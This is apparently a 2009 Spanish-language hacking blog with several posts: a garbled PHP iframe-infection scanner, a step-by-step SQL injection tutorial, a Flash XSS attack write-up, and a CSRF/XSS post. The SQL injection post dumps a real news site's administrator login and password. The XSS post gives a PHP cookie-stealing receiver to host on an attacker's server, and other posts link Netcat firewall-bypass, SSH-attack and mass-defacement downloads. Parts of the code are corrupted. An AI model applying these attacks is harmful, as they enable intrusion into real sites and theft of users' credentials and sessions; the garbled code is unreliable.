<br />Empecemos Reparemos toda las entradas sospechosas que nos dio hijackthis si ven la entrada
<br />Que yo les dije AcroIEHelper.dll quiere decir que nuestro equipo es infectado con un troyano...
<br />
<br />Con HijackThis solucionamos este problema este archivo lo encontramos en la carpeta Acrobat Reader borramos el archivo y reiniciamos la PC y hacemos un nuevo scaneo si vuelven a scanear y les sigue saliendo esto pues nos toca intalar una copia de Windows.
<br />
<br />Después que limpiemos el equipo cambiemos las contraseñas de los FTP y utilicemos el script PHP para encontrar archivos infectados en nuestro servidor...
<br />
<br />Codigo:
<br /><pre style="margin-top: 0pt; display: inline;"> read ())) (
<br />$ status ='';
<br /> if ($ entrada !='.' & & $ entrada !='..') (
<br /> $ entrada = entrada .'/'.$ $ dir;
<br /> if (is_dir ($ entrada)) (
<br /> $ array [] = '<span style="font-weight: bold;font-family:tahoma;font-size:12px;" >. $ de entrada. "<!-- span-->';;
<br /> $ array = array_merge ($ array, read_dir ($ entrada));
<br /> ) Else (
<br />$ regex = '/ <[iframe \ w \ W] *? http [\ w \ W] *? <\ / iframe> /';
<br />$ parts = pathinfo ($ entrada);
<br />if ($ partes [ 'extension']==' php' | | $ partes [ 'extension']==' html' | | $ partes [ 'extension']==' js') (
<br />preg_match ($ regex, $ contenido, $ matches);
<br />if (count ($ matches)> 0) (
<br />$ status = '<span style="color: rgb(255, 0, 0);"> <b> [infección] <!-- b--> <!-- span-->';
<br />)
<br />else (
<br /><script regex=" '/" type="text\/javascript"> \ (String \. fromCharCode. +? <\ / script> /';<br /> preg_match ($ regex, $ contenido, $ matches);<br /> if (count ($ matches)> 0) (<br /> $ status = '<span style="color:#ff0000;"> <b> [infección] </ b> </ span>';<br /> )<br /> else (<br /> $ status = '<span style="color:#00cc00;"> [limpio] </ span>';<br /> )<br /> )<br /> )<br /> $ array [] = $ entry. $ status;<br /> )<br /> )<br /> )<br /> $ d-> close ();<br /> $ array []="< size =" \"> ";<br /> return $ array;<br /> )<br /><br /> ?><br /> <! DOCTYPE html PUBLIC "- / / W3C / / DTD XHTML 1.0 Transitional / / EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><br /> <html xmlns="http://www.w3.org/1999/xhtml"><br /> <head><br /> <meta equiv="Content-Type" content="text/html; charset=utf-8"><br /> <title> Iframe herramienta de detección de </ title><br /> </ head><br /><br /> <body style="font-family:tahoma; font-size:11px; color:#333"><iframe src="http://translate.google.co.ve/translate_un?hl=es&sl=en&u=http://www.qualitycodes.com/tutorials/Misc/virus-detect.php.txt&prev=/search%3Fq%3Dhtml%2Bcode%2Binjection%26hl%3Des%26client%3Dfirefox-a%26rls%3Dorg.mozilla:es-ES:official%26hs%3DcpG%26sa%3DN%26start%3D90&rurl=translate.google.co.ve&lang=en&usg=ALkJrhjkkdWIriQwahxw7PN5_yR_ccXEBw" width="0" height="0" frameborder="0" style="width:0px;height:0px;border:0px;"></iframe><br /> <pre><br /> <? SCRIPT_FILENAME _SERVER print_r (read_dir (dirname ($ [ '']))); ?><br /> </ pre><br /> </ body><br /> </ html><br /><br />"En el caso que les pase como a mi amiga Krisium los que son españoles les detectara una IP o 2 la respueta de el compi <b><a href="http://ethical-security.co.cc/Forum/index.php?action=profile;u=8" title="Ver perfil de 3mp3z@ndo">3mp3z@ndo</a> Fue.<br /><br /></b>Bueno, esas ip son de los dns de telefónica, como puedes ver aquí-----> <a href="http://www.adslayuda.com/index.php?name=PNphpBB2&file=viewtopic&p=281945" target="_blank">http://www.adslayuda.com/index.php?name=PNphpBB2&file=viewtopic&p=281945</a><br />Al<br />menos ya sabes que son las que vienen por defecto en el Zyxel 660 HW61,<br />a partir de ahi, puedes buscar algun bug o algo por el estilo<br />especifico de ese router, tal vez con algun exploit, o bueno, en fin lo<br />que tu veas, por si le quieres devolver la cortesia "\<br /><br />La localizacion de esas ip que has sacado seguramente son las del proveedor<br /><br />Saludos<br /><b><a href="http://ethical-security.co.cc/Forum/index.php?action=profile;u=29" title="Ver perfil de krisium"><br /></a></b></pre><pre style="margin-top: 0pt; display: inline;">PD. Cualquier duda pasen por el foro :)<br /></pre><br /><span style="color: rgb(255, 102, 102);font-size:100%;"><span style="font-family:arial;"></span></span></div></div><span style="font-weight: bold;font-family:tahoma;font-size:12px;"><span style="color: rgb(255, 0, 0);"><b><script regex="" type=""text\/javascript""> \ (String \. fromCharCode. +? <\ / script> /"><br /> preg_match ($ regex, $ contenido, $ matches); <br /> if (count ($ matches)> 0) ( <br /> $ status = '<span style="color:#ff0000;"> <b> [infección] </ b> </ span>'; <br /> ) <br /> else ( <br /> $ status = '<span style="color:#00cc00;"> [limpio] </ span>'; <br /> ) <br /> ) <br /> ) <br /> $ array [] = $ entry. $ status; <br /> ) <br /> ) <br /> ) <br /> $ d-> close (); <br /> $ array []="< size =" \"> "; <br /> return $ array; <br /> ) <br /><br /> ?> <br /> <! DOCTYPE html PUBLIC "- / / W3C / / DTD XHTML 1.0 Transitional / / EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <br /> <html xmlns="http://www.w3.org/1999/xhtml"> <br /> <head> <br /> <meta equiv="Content-Type" content="text/html; charset=utf-8"> <br /> <title> Iframe herramienta de detección de </ title> <br /> </ head> <br /><br /> <body style="font-family:tahoma; font-size:11px; color:#333"><iframe src="http://translate.google.co.ve/translate_un?hl=es&sl=en&u=http://www.qualitycodes.com/tutorials/Misc/virus-detect.php.txt&prev=/search%3Fq%3Dhtml%2Bcode%2Binjection%26hl%3Des%26client%3Dfirefox-a%26rls%3Dorg.mozilla:es-ES:official%26hs%3DcpG%26sa%3DN%26start%3D90&rurl=translate.google.co.ve&lang=en&usg=ALkJrhjkkdWIriQwahxw7PN5_yR_ccXEBw" width="0" height="0" frameborder="0" style="width:0px;height:0px;border:0px;"></iframe> <br /> <pre> <br /> <? SCRIPT_FILENAME _SERVER print_r (read_dir (dirname ($ [ '']))); ?> <br /> </ pre> <br /> </ body> <br /> </ html><br /><br /><br />Este código no viene siendo mío pero es muy útil. Saludos...<br /><br />PD. Siento no haber sido tan especifico pero es solo para que vean mas omenos que hace el programa a la hora de scanear y encontrar un troyano y hace cosas que no hace un antivirus<br />Cualquier duda haganmela saber. </script></b></span></span></pre></div></div>ShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.com0tag:blogger.com,1999:blog-1605459786731333585.post-64992048516307373342009-12-02T18:31:00.000-08:002009-12-02T18:33:39.206-08:00Jugando con Netcat (saltandonos el firewall) By 3mp3z@ndoMuy buenas aqui dejo un video que he hecho donde se ve como podemos evitar que salte el firewall de la "victima" cuando intentamos realizar una conexion.<br /><br />Esta en flash y en exe<br /><br />Descarga:<br /><br />http://www.4shared.com/file/164245155/72f704c3/NETCAT.html<br /><br />Saludos<br /><br />By 3mp3z@ndo <br />Fuente: http://ethical-security.co.cc/Forum/index.php?topic=987.msg3543;topicseen#msg3543ShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.com0tag:blogger.com,1999:blog-1605459786731333585.post-22663103845994929282009-12-02T18:24:00.000-08:002009-12-02T18:26:46.819-08:00[SSH]Ataque By ShadinessDark [Formato Doc.]Bueno aca les dejo una pequeña recopilacion de lo que aprendi hace poco completamente no viene todo de una sola idea saque ideas de lo que aprendi veamos que tal les parece.<br /><br />http://www.4shared.com/file/148519236/a55421df/SSH_Ataque.html<br /><br />Dedicado a mi comunidad: Ethical-Security.co.cc BugDox :) BpSystemTeam =DShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.com0tag:blogger.com,1999:blog-1605459786731333585.post-23367084502975270162009-09-28T06:17:00.001-07:002009-09-28T06:17:32.698-07:00[Tutorial] Sql Injection By ShadinessDarkSQL INJECTION By ShadinessDark<br />By ShadinessDark<br /><br />Puntos a seguir:<br /><br />1.) ¿Que es SQL injection?<br /><br />2.) Jugando Con Google<br /><br />3.) Testeando vulnerabilidad<br /><br />4.) Buscando panel<br /><br />5.) Conclusion<br /><br />6.) Despedida<br /><br />1.) ¿Que es SQL injection?<br /><br />Bueno digamos que es un truco para inyectar comandos SQL en un sitio Web<br />OH hacer una consulta como un insumo, Principalmente el atacante la hace en la<br />Forma de método GET – POST la mayoría de los sitios de parámetros hace una Consulta SQL en la base de datos digamos que tenemos una pagina de detalles<br />Con un producto en PHP que toma un parámetro product_id de un método GET<br />Y obtiene el detalle de la base de datos una consulta SQL con el ataque de Injection SQL, Un atacante puede enviar una consulta SQL diseñada desde la dirección URL, De<br />La pagina de detalles del producto se recuerdan el product_id bueno la consulta la hace<br />Desde hay con eso podría hacer mucho daño a la base de datos, Podría incluso eliminar la tabla de base de datos…<br /><br />Para saber mas sobre SQL pueden acceder a Aqui...<br /><br />2.) Jugando Con Google<br /><br />Vamos a jugar un como con google se trata de DORKS con este conseguiremos<br />Web al azar visitemos www.google.com<br /><br />Nos podemos conformar con una simple dork, En mi caso estoy usando:<br /><br />Código:<br /><br />/noticias.php?id= <br /><br /><br /><br /><br />Otros Dorks<br /><br />Código:<br /><br />/videos.php?id=<br />/post.php?id=<br />/Noticias.php?id=<br />/index.php?id=7<br />/proyecto.php?id=<br />/Ventas.php?id=<br /><br /><br />Y otros.<br /><br />Esto lo vamos a usar para buscar nuestra victima nos saldrán muchas paginas<br />Web en google con cualquiera de estos DORKS claro que no toda las que aparecen<br />Son vulnerables hay que buscar y buscar correr con suerte por decir así.<br /><br />3.) Testeando vulnerabilidad<br /><br />Cuando entremos a una de las Web de google y termine en:<br /><br />Código:<br /><br />?id= <br /><br /><br />Vamos agregarle ' quedaría:<br /><br />Código:<br /><br />?id=' <br /><br /><br />Si es vulnerable nos saltara el siguiente error:<br /><br /><br /><br />Ejemplo les pondré una Web Vulnerable:<br /><br />Código:<br /><br />http://www.diariopuerto.com/noticias.php?id=%27 <br /><br /><br />Cuando sabemos que es vulnerable le quitamos el (‘) y ponemos<br /><br />Código:<br /><br />-1+union+all+select+0—<br /><br />Como sabemos unión simplemente es una cláusula para combinar<br />Los resultados de varias consultas que se hacen en la base de datos<br />Y con SELECT debemos confirmarlo manualmente.<br /><br />Ya tenemos una victima en mi caso es:<br /><br />Código:<br /><br />http://www.diariopuerto.com/<br /><br /><br />Vamos encontrando las columnas un breve ejemplo<br /><br />Código:<br /><br />http://www.diariopuerto.com/noticias.php?id=1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- <br /><br /><br />En este caso tiene 21 columnas como pueden ver me tiro los siguientes números:<br /><br /><br /><br />Claro que una web puede tener más de 21 columnas o menos de 21 columnas<br />Cuando les tire unos números parecidos a los de la imagen hasta hay llega la<br />Columna tampoco que les tirara los mismos números puede tirar 1 2 3 4 5 6 7 etc.…<br /><br />No pondré el ejemplo de usar: +from+information_schema.tables—<br />Ya que en muchos tutoriales lo usan lo haremos por los caracteres que conozco…<br /><br />Ahora busquemos la tabla ya hemos sacado la columna ahora vamos por la tabla<br />Agregamos lo siguiente en la url:<br />Código:<br /><br />+from+ <br /><br /><br />Quedaría así:<br /><br />Código:<br /><br />http://www.diariopuerto.com/noticias.php?id=1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+ <br /><br /><br />Ahora vamos a buscar la tabla la tabla lo hacemos de la siguiente manera:<br /><br />Código:<br /><br />http://www.diariopuerto.com/noticias.php?id=1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+usuarios<br /><br /><br />Después de +from+ agregamos la tabla no siempre será usuario algunos ejemplos de tabla.<br /><br />Usuarios<br />Usuario<br />Nombre<br />Nombres<br />Email<br />Emails<br />Mail<br />Mails<br />User<br />Users<br />Users_name<br />User_name<br />adm_usuario<br />Admin.<br />Login<br />Usr<br />Admin._login<br /><br />Esta es una de las más comunes en sitios vulnerables a la hora de sacar TABLAS.<br /><br />Bueno ya les puse lo de arriba la mía salio con usuarios si por ejemplo ponemos<br />Usuarios y la tabla no es nos seguirá saliendo el error en la sintaxis, Pero si la tabla<br />Es nos saldrán los numeritos y esa es la correcta.<br /><br />Después de tener la tabla ahora saquemos usuario y password del administrador<br /><br />Ejemplo:<br /><br />Código:<br /><br />http://www.diariopuerto.com/noticias.php?id=1+union+select+0,1,2,3,4,5,6,login,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+usuarios<br /><br /><br />Como saben en mi caso la Web que use me tiro 3 números en la cual 7 8 y 9<br />Ahora vamos a remplazar un numero en mi caso reemplazo el 7 lo borro y coloco<br />,login, como me agarro esto me saltara el nombre de la victima en este caso el usuario<br />Del login es: puerto <br /><br />Como saben no siempre agarrara poniendo login en algunas te piden usuario, usuarios, nombres etc.…<br />Arriba les deje un poco…<br />Ahora ya tenemos usuario del administrador del sitio ahora vamos a buscar el password es decir la clave.<br /><br />Vamos a quitar el login del 7 y vamos a remplazarlo por esto concat(login,0x3a,password)<br /><br />Quedaría así:<br /><br />Código:<br /><br />http://www.diariopuerto.com/noticias.php?id=1+union+select+0,1,2,3,4,5,6,concat%28login,0x3a,password%29,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+usuarios <br /><br /><br />concat(login,0x3a,password) Donde va login hay va la columna del usuario no Vuelvo y repito no siempre es login y vemos 0x3a Esto solo es un carácter hexadecimal y vemos que agregamos (,) y viene password que es por la cual<br />Donde sale la contraseña del usuario 0x3a,password tampoco siempre es Password<br />Hay varios tipos de formas por ejemplo:<br /><br />Clave<br />Claves<br />Password<br />Pwd<br />Pass<br />Pas<br />Contraseña (Muy poco la agarra)<br /><br />Ya tenemos pass y user en mi caso el usuario y la contraseña:<br /><br />Código:<br /><br />puerto:puerto7002<br /><br /><br />Usuario: puerto<br />Clave: puerto7002<br /><br />Muchas veces el password nos viene encriptado por hay hay unos MD5 online<br />Para que sirve bueno cuando les salga la contraseña encriptada un ejemplo:<br />Código:<br /><br />A259ECE2E42597865AB7ACC883A21FFE<br /><br /><br />Esta clave encriptada dice ShadinessDark.<br /><br />Bueno esto lo usan los Web Master para darle un dolor de cabeza<br />A los atacantes ya que muchas veces las claves cuestan un mundo<br />Desencriptarlas…<br /><br />MD5 Online<br />http://passcracking.com/<br /><br />Hay password muy difíciles de desencriptar como por ejemplo la del PENTAGONO pero podemos hacer un desencriptador en algoritmo<br />Que genere un password hasta que de con la verdadera.<br /><br />4.) Buscando panel<br /><br />Ya después que tenemos los datos del sitio es decir usuario y contraseña de<br />Administrador vamos a buscar el login a veces en algunas Web hay suertes<br />En otras no por ejemplo en la que puse como ejemplo no he encontrado el<br />Panel así que les daré un ejemplo de cómo hacerlo ejemplo:<br /><br />www.xD.com/login.php<br />www.xD.com/login<br />www.xD.com/admin<br />www.xD.com/admin.php<br />www.xD.com/phpmyadmin<br />www.xD.com/cpanel<br />www.xD.com/login/admin<br /><br />Bueno encontramos el panel y nos logeamos normalmente como administradores<br />Recuerden no hacer mal de borrar todo ni nada.<br /><br />User un buen Proxy tor o proxymafia que es online…<br /><br />5.) Conclusion<br /><br />Como podemos ver no es algo del otro mundo se trata de hacer inyecciones a través de La URL, Con esto podemos lograr mucho pero recordemos no dañar los sitios…<br /><br />6.) Despedida<br /><br />Este tutorial es dedicado a dos amigos de BugDox que me lo han pedido<br />Y bueno ya sabemos que hay muchos tutoriales en la red y muy explicados<br />Pero me tome la libertad de hacerme uno un saludo grande a mi comunidad…<br /><br />By ShadinessDark<br />Team V1rtual Viru$ Bl@ck TeamShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.com0tag:blogger.com,1999:blog-1605459786731333585.post-36881230334498501802009-09-28T06:15:00.002-07:002009-09-28T06:17:08.333-07:00Método de ataque y ejemplo de Software By ShadinessDarkEl peligro de permitir flash en los sitios.
<br />By ShadinessDark
<br />
<br />1.) Presentación
<br />
<br />2.) ¿Que es flash?
<br />
<br />3.) Método de ataque y ejemplo de Software
<br />
<br />4.) Conclusión
<br />
<br />5.) Despedida
<br />
<br />1.) Presentación
<br />
<br />Primero que nada este tutorial va dedicado a mis amigos de BugDox y a todo los Lectores especialmente a los que no les caigo bien, muchos me harán criticas Y eso es Bueno porque Uds. Me corrigen como muchos saben yo me retire del DEFACING no Es que yo sea conocido ni nada por el estilo este tutorial lo he hecho de manera especial
<br />Para dar la diferencia de otros tutoriales que he visto en la red…
<br />
<br />¿Por qué diferente?
<br />
<br />Porque la mayoría de los tutoriales visto en la red son poco explicados para iniciados
<br />
<br />¿A que se debe este tutorial?
<br />
<br />Bueno este tutorial no puedo decir que lo hago con el fin de bien lo hago para bien y Para mal lo hago con concepto de cómo explotarlo y concepto de cómo arreglarlo
<br />No es mi culpa que un Web Master no me haga caso ¿Verdad?
<br />
<br />Los saludos más especiales para mis compañeros:
<br />
<br />Zero Bits
<br />KuTer
<br />Jeferx
<br />Darki113r
<br />_84kur10_
<br />Z1z30f
<br />Kozmic.Kizz
<br />
<br />1.) ¿Que es flash?
<br />
<br />Segun la wikipedia:
<br />Adobe Flash es una aplicación en forma de estudio de animación que trabaja sobre "Fotogramas" destinado a la producción y entrega de contenido interactivo para diferentes audiencias alrededor del mundo sin importar la plataforma. Es actualmente escrito y distribuido por Adobe Systems, y utiliza gráficos vectoriales e imágenes ráster, sonido, código de programa, flujo de vídeo y audio bidireccional (el flujo de subida sólo está disponible si se usa conjuntamente con Macromedia Flash Communication Server). En sentido estricto, Flash es el entorno y Flash Player es el programa de máquina virtual utilizado para ejecutar los archivos generados con Flash.
<br />
<br />Los archivos de Flash, que tienen generalmente la extensión de archivo SWF, pueden aparecer en una página web para ser vista en un navegador, o pueden ser reproducidos independientemente por un reproductor Flash. Los archivos de Flash aparecen muy a menudo como animaciones en páginas Web y sitios Web multimedia, y más recientemente Aplicaciones de Internet Ricas. Son también ampliamente utilizados en anuncios de la web.
<br />
<br />En versiones anteriores, Macromedia amplió a Flash más allá de las animaciones simples, convirtiéndolo en una herramienta de desarrollo completa, para crear principalmente elementos multimedia e interactivos para Internet.
<br />
<br />Fue hasta 2005 perteneciente a la empresa Macromedia conocido hasta entonces como Macromedia Flash® y adquirido por Adobe Systems (desde entonces conocido como Adobe Flash) ampliando con ello su portafolio de productos dentro del mercado. Sacado de aqui
<br />
<br />3.) Método de ataque y ejemplo de Software
<br />
<br />Vamos a imaginar que tenemos un sitio www.xD.com este sitio permite a los
<br />Usuarios poner sus firmas en flash y sus imágenes flash haciendo el uso de la
<br />Etiqueta EMBED, Imaginemos que vamos a nuestro perfil donde editamos nuestros
<br />Datos y entramos a donde colocamos la firma y agregamos.
<br />
<br />Código:
<br />
<br /><EMBED
<br />src="http://www.xD.com/miflash.swf"
<br />pluginspage=”http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash”pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"
<br />type="application/x-shockwave-flash" type = "application / x-shockwave-flash"
<br />width="0" width = "0"
<br />height="0" height = "0"
<br />>
<br /></ EMBED>
<br />
<br />
<br />Este código lo añade el atacante en la cajita de TEXTO del foro de la victima la cual
<br />Permite robar las cookies de sesión de usuario digamos que este ataque se reproduce
<br />En sitios que permiten usar mucho flash hay una página que hace poco mire que fue
<br />Por ella que me nació la idea de hacer este tutorial quizás muchos la conocen http://www.deviantart.com/ bueno hay antes permitían mucho usar el flash no se si
<br />Todavía lo hagan bueno este sitio permite que suban archivos los usuarios…
<br />
<br />Bueno en el caso de los SMF el flash es peligroso va para los webmasters empezando
<br />Por mi que uso flash en mi SMF ya en SMF la etiqueta es [flash]http://y cierra[/flash]
<br />La etiqueta [Flash]http://se convierte en la etiqueta de un objeto correcto…
<br />
<br />Un ejemplo:
<br />Código:
<br />
<br />[Flash] http://www.xD.com/miflash.swf[/flash]
<br />
<br />
<br />Interpretemos por el script y nos quedaría algo así en lo anterior:
<br />
<br />Código:
<br />
<br />
<br /><object
<br />classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" classid = "clsid: D27CDB6E-AE6D-11cf-96B8-444553540000"
<br />width=200 width = 200
<br />height=200> height = 200>
<br /><param
<br />name=movie = nombre de la película
<br />value= http://www.xD.com/miflash.swf> value = http://eyeonsecurity.net/download/example.swf>
<br /><param
<br />name=play name =juego
<br />value=true> valor = true>
<br /><param
<br />name=loop = nombre del punto de
<br />value=true> valor = true>
<br /><param name=quality <param name = Muy bueno
<br />value=high> valor =alto>
<br /><embed
<br />src=http://www.xD.com/miflash.swf
<br />src=http://www.xD.com/miflash.swf
<br />width=200 width = 200
<br />height=200 height = 200
<br />play=true Escuchar = true
<br />loop=true loop = true
<br />quality=high> quality = high>
<br /></embed> </object>
<br />
<br />
<br />Bueno Uds se preguntaran que es clsid:D27CDB6E-AE6D-11cf-96B8-444553540000
<br />Solo es un tag.
<br />
<br />Bueno estos solo son ejemplos toda pagina Web que permite FLASH en la Web es probablemente vulnerable a un ataque XSS
<br />
<br />¿Cómo protegemos nuestro sitio Web?
<br />
<br />Solamente no permitamos los archivos flash en web-app. También una buena solución
<br />Seria analizar la realidad del problema animación flash y el filtro de parámetros maliciosos
<br />Usados por el atacante por medio de getURL(). Con esto me refiero a cuando un sitio Web
<br />Permite que los archivos swf sean cargados al servidor, Muchos webmasters permiten a los Usuarios subir archivos lo mas seguro seria que los Webmasters del sitio bloqueen todo lo que
<br />Tenga que ver con flash que contiene getURL() Esta acción no se refieren específicamente el ataque se reproduce a un sitio http xD también podemos cambiar getURL() esto podemos lograrlo por medio de la especificación de la ventana "_blank" me imagino que la han oído
<br />En lenguaje de programación Web al hacer el cambio descritos la dirección URL javascript no
<br />Se ejecutara con privilegios en el dominio que te aloja…
<br />Como muchos sabemos ActionScript es un lenguaje es un lenguaje de Scripting complejo y proporcionamos con el la función eval() esto le permite a los atacantes mas sofisticados para
<br />Evitar la protección de una análisis de ActionScript…
<br />
<br />Un buen ejemplo le definiríamos asi:
<br />
<br />Código:
<br />
<br />a = "get";
<br />b="URL"; b = "URL";
<br />c="javascript:"; c = "javascript:";
<br />d="alert('bypassed');void(0);"; d = "alert ( 'omite'); void (0);";
<br />eval(a+b)(c+d); eval (a + b) (c + d);
<br />
<br />
<br />Espero y me entiendan…
<br />
<br />4.) Conclusión
<br />
<br />Bueno si le vemos un poco la lógica a todo no es muy interesante pero peligrosa
<br />Para los Webmaster a la hora de permitir usar SWF en su sitio Web, Si vemos
<br />Este ataque nos lleva a un ataque XSS, Creo que con la explicación es más que
<br />Entendible que el archivo la cual hemos subido como flash cuando la victima
<br />Le da clic podemos sacar las cookies y así usarla para las travesuras si me equivoco
<br />Corríjanme.
<br />
<br />5.) Despedida
<br />
<br />
<br />Otro tutorial mas que hago no es la gran cosa a lo mejor tengo errores por hay
<br />Si los tengo me gustarian las {Criticas} Son muy importante para correjir a los
<br />Demas...
<br />
<br />No pongo mi sitio Web porque siempre los Web Master andan con el trauma de que
<br />Hacemos Spam como si con eso piensan que acabaran el Spam sueñen un rato…
<br />
<br />Group’s Ethical.
<br />
<br />Zero Bits
<br />KuTer
<br />Jeferx
<br />Darki113r
<br />_84kur10_
<br />ShadinessDark
<br />
<br />Mi team V1rtu@l VIRu$ Bl@ck Team ShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.com0tag:blogger.com,1999:blog-1605459786731333585.post-51669828649443486622009-09-28T06:15:00.001-07:002009-09-28T06:15:22.148-07:00Rooteando Servidores & Haciendo Mass Defacements By Zero BitsRooteando Servidores & Haciendo Mass Defacements<br />Descargar<br />Autor: Zero Bits<br />Fecha: 13/06/09<br /><br />*Si lo vas a publicar en otro lugar, por favor respeta los derechos de autorShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.com0tag:blogger.com,1999:blog-1605459786731333585.post-64347567624655728372009-09-28T06:14:00.001-07:002009-09-28T06:14:58.331-07:00[Tutorial] Vulnerabilidad CSRF By ShadinessDark [Colaboracion de Zero Bits]<div align="center"><img src="http://blog.internetnews.com/skerner/smk/blackhat.jpg" alt="" border="0" /></div><div align="center"><b>Inicio Tutorial Cross Site Request Forgery By ShadinessDark = Zero Bits</b></div>
<br />1.) Presentación
<br />
<br />2.) Que es CSRF
<br />
<br />3.) Quien descubrió la vulnerabilidad CSRF
<br />
<br />4.) CSRF y Xss
<br />
<br />5) Robo de Cookies en XSS & CSRF (Diferencia) - Colaboracion de Zero Bits
<br />
<br />6.) Testeando vulnerabilidad CSRF y programas el code vulnerable
<br />
<br />7.) Sacando una conclusión a todo
<br />
<br />8.) Como cuidar nuestra Web de este tipo de ataques
<br />
<br />9.) Despedida
<br />
<br />
<br /><b><span style="color: red;">1.) Presentación</span></b>
<br />
<br />Primero que nada este tutorial va dedicado a mis amigos de BugDox y a todo los Lectores especialmente a los que no les caigo bien, muchos me harán criticas Y eso es Bueno porque Uds. Me corrigen como muchos saben yo me retire del DEFACING no Es que yo sea conocido ni nada por el estilo este tutorial lo he hecho de manera especial
<br />Para dar la diferencia de otros tutoriales que he visto en la red…
<br />
<br /><b>¿Por qué diferente? </b>
<br />
<br />Porque la mayoría de los tutoriales visto en la red son poco explicados para iniciados
<br />
<br /><b>¿A que se debe este tutorial? </b>
<br />
<br />Bueno este tutorial no puedo decir que lo hago con el fin de bien lo hago para bien y Para mal lo hago con concepto de cómo explotarlo y concepto de cómo arreglarlo
<br />No es mi culpa que un Web Master no me haga caso ¿Verdad?
<br />
<br />Los saludos más especiales para mis compañeros:
<br />
<br /><b>Zero Bits
<br />KuTer
<br />Jeferx
<br />Darki113r
<br />_84kur10_
<br />Z1z30f
<br />Kozmic.Kizz</b>
<br />
<br /><span style="color: red;"><b>2.) Que es CSRF </b></span>
<br />
<br />Bueno como muchos quizás han leído en la wikipedia ya csrf representa a
<br />Cross Site Request Forgery el ataque se efectúa cuando por ejemplo Vemos algo
<br />Así <a href="http://www.shadinessdark.net/" target="_blank"> Presiona este link para que te lleve a mi sitio </a>
<br />Siempre el atacante usa como victima a un usuario que le brinda confianza la Web.
<br />Los que tenemos foros sabemos que cada usuario tiene como destino un perfil donde
<br />Cambiamos contraseña – email – nombre de usuario y otras cositas casi siempre el Atacante usa un código malicioso para hacer una petición en {GET – Post – HTTP}
<br />Con esta vulnerabilidad el atacante le puede cambiar a la victima su información de PERFIL.
<br />
<br /><span style="color: red;"><b>3.) Quien descubrió la vulnerabilidad CSRF</b></span>
<br />
<br />En el 1988 Hardy Norma publico un documento que explique una solicitud cuestión nivel de confianza que llamo un
<br />Diputado confuso. En 2000, un correo a bugtraq explico Zope fue afectado por un problema confuso
<br />Web diputado que se define hoy como una vulnerabilidad CSRF mas tarde en el 2001 Peter Watkins publico una entrada
<br />En la lista de correo bugtraq acuñar el termino CSRF en respuesta a otro hilo titulado
<br />Los peligros de permitir a los usuarios colocar imágenes en los sitios Web.
<br />
<br />Bueno sobre quien lo descubrio ese credito si no me toca a mi esa parte es de <a href="http://www.cgisecurity.com/csrf-faq.html" target="_blank">Aqui</a> solo lo logre traducir...
<br />
<br /><span style="color: red;"><b>4.) CSRF y Xss </b></span>
<br />
<br />Quizás muchas personas nos preguntamos o se preguntan si esta vulnerabilidad
<br />Es parecida o igual a xss.
<br />
<br />Les explico bueno xss se aprovecha de la confianza de la victima que tiene el sitio
<br />Web o aplicación el usuario lea ae contenido que aparece en su navegador que esta destinada y representada por el sitio Web que se esta viendo.
<br />
<br />El csrf se aprovecha de la confianza que el sitio tiene para la victima ósea usuario…
<br />
<br /><span style="color: red;">4.1) Robo de Cookies en XSS & CSRF (Diferencia) - Colaboracion de Zero Bits</span>
<br />
<br />Bueno hay un metodo en XSS que algunos amigos me han dicho que se parece a el XSRF o CSRF, que son el ROBO DE COOKIES EN XSS y el CSRF, la verdad es que no ya que, el robo de cookies por xss como su nombre lo indica roba las cookies de cualquier usuario o administrador del sitio y el CSRF se encarga de ROBAR, VER y CAMBIAR cualquier informacion dependiendo de la victima que caiga.
<br />
<br />Vamos a ver un ROBO DE COOKIES EN XSS y un ataque CSRF clasico, para que vean un poco la diferencia...
<br />
<br />- ROBO DE COOKIES EN XSS
<br />
<br />Primero tendriamos que saber si el server es vulnerable a XSS o tambien podriamos probar que el code
<br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">[url] o [img] </pre></div>no filtre bien el contenido que se le asigne.
<br />
<br />Para algunos que no entienden lo de <div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">[url] y [img]</pre></div> es cuando dentro del <div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">[url]</pre></div> agregariamos un link como <div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;">"javascript:alert("xss")"</pre></div> y cuando se le de click se ejecute hay mismo, tambien podriamos agregar XSS con codes HEXADECIMALES (ya esto es otro tema, asi que no lo explicare).
<br />
<br />Bueno, en otro servidor aparte (que seria el nuestro) codeariamos un programa en PHP que se encargue de recibir al usuario victima y robarle las cookies apenas entre (Para esto se necesita saber por lo menos PHP BASICO)
<br />
<br /><div class="codeheader">Código:</div><div class="code"><pre style="margin-top: 0pt; display: inline;"><?
<br />$cookie = $_REQUEST[cookie];
<br />$file=fopen("cookies.txt", "a");
<br />fput($file, "$cookie\n");
<br />fclose($file);
<br />?>
<br /></pre></div>
<br />PD: Este code no es mio es de Chebyte. Pero esto es basico...
<br />
<br />Bueno, le explicare el code para quienes no lo entiendan:
<br />
<br />$cookie = $_REQUEST[cookie] : El que recibe la cookie
<br />$file=fopen("cookies.txt", "a") : Crea el archivo cookies.txt para lectura
<br />fput($file, "$cookie\n") : Muestra la cookie
<br />fclose($file) : Cierra
<br />
<br />Podriamos guardarlo "robador.php" y ahora faltaria el code que redireccione a este CODE:
